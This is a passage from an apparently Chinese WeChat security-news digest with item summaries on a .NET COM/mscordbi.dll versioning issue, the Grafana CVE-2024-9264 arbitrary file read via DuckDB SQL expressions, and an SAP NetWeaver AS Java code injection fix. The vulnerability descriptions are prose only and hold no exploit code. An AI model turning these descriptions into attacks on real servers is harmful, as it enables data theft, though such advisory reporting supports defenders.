	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">COM 对象激活的陷阱：.NET 非托管 API 的安全风险</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">COM 对象激活的陷阱：.NET 非托管 API 的安全问题</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAjpkBbwbvjOicO3Ahl6DuSf6hIEnCAic3F59riakzmicicWicVRuHHaw95ruw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAjpkBbwbvjOicO3Ahl6DuSf6hIEnCAic3F59riakzmicicWicVRuHHaw95ruw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858228514514281"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">COM接口在.NET应用程序的调试和托管中起着关键作用，但是在实际使用中可能会遇到与CLR版本不兼容的问题。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">COM对象的创建API（如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CreateInstance</code>等）可能会加载错误版本的<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">mscordbi.dll</code>，导致无法预测的行为，往往是方法调用失败。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">DllGetClassObjectInternal</code> Win32 API获取正确版本的<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">mscordbi.dll</code>是解决问题的关键步骤。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">手动激活COM类并确保与CLR版本兼容可以避免接口方法调用失败的问题，文章中的C++代码示例说明了这一点。</section></li></ul>
	<br/>
	<p>🏷️: COM, ICorPublish, 版本兼容性, 解决方案</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 Grafana中的CVE-2024-9264漏洞允许执行任意DuckDB SQL查询</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了Grafana中的CVE-2024-9264漏洞利用方法，该漏洞允许经过身份验证的用户通过修改Grafana仪表板中的表达式执行任意DuckDB SQL查询，从而读取文件系统中的任意文件。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d89ae589&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAeX8Rd4Qd96m7EhsnpINLibMSzBRkMFiabVEvyoNcCVqOX294gjtfeQcg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Grafana 认证 RCE 漏洞分析：CVE-2024-9264</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Grafana 任意文件读取漏洞 (CVE-2024-9264) 利用</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA84iaibpSSmgxKK8Yt0XVnofUXh7iaCCvHywypXIRESzyMWKu3wibLpk0FQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA84iaibpSSmgxKK8Yt0XVnofUXh7iaCCvHywypXIRESzyMWKu3wibLpk0FQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858228514855821"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-9264是一个严重的安全漏洞，可以被用来读取Grafana服务器上的任意文件，这对于系统的安全性和数据的保密性构成了严重威胁。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的存在与否取决于DuckDB的安装状态。默认情况下，Grafana不包含DuckDB，因此在默认安装的Grafana服务器上，该漏洞不可利用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Grafana团队已经提供了修复方案，即完全移除了SQL表达式功能，这是一种有效的修复策略，能够完全阻止漏洞的利用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全更新是防止漏洞利用的关键。用户应该及时更新到最新的修复版本，以确保他们的Grafana环境不受攻击。</section></li></ul>
	<br/>
	<p>🏷️: CVE, Grafana, SQL注入, DuckDB, 漏洞利用</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 SAP NetWeaver AS Java 代码注入漏洞修复</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">SAP 发布了安全更新 3433192，解决了 SAP NetWeaver AS Java 管理员日志查看器插件中的关键代码注入漏洞（CVE-2024-22127），该漏洞可能允许攻击者上传恶意文件，危及系统的保密性、完整性和可用性。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.17037037037037037" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8f4c7e94&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EA2MMhN5CicuCY4YsBzIRYcSzjSA3k7UAPGmeN4Vj5RkTCfBCSwGcb40w%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4989293361884368" data-w="934" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=63c1908a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAKzlUPHwOPvnGDQRG14FQelP4QU6loEk9RQRORZtQaibRUXvxrhG2wdw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SAP NetWeaver AS Java 代码注入漏洞</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SAP NetWeaver AS Java 中发现代码注入漏洞</section></li></ul>
	<section>
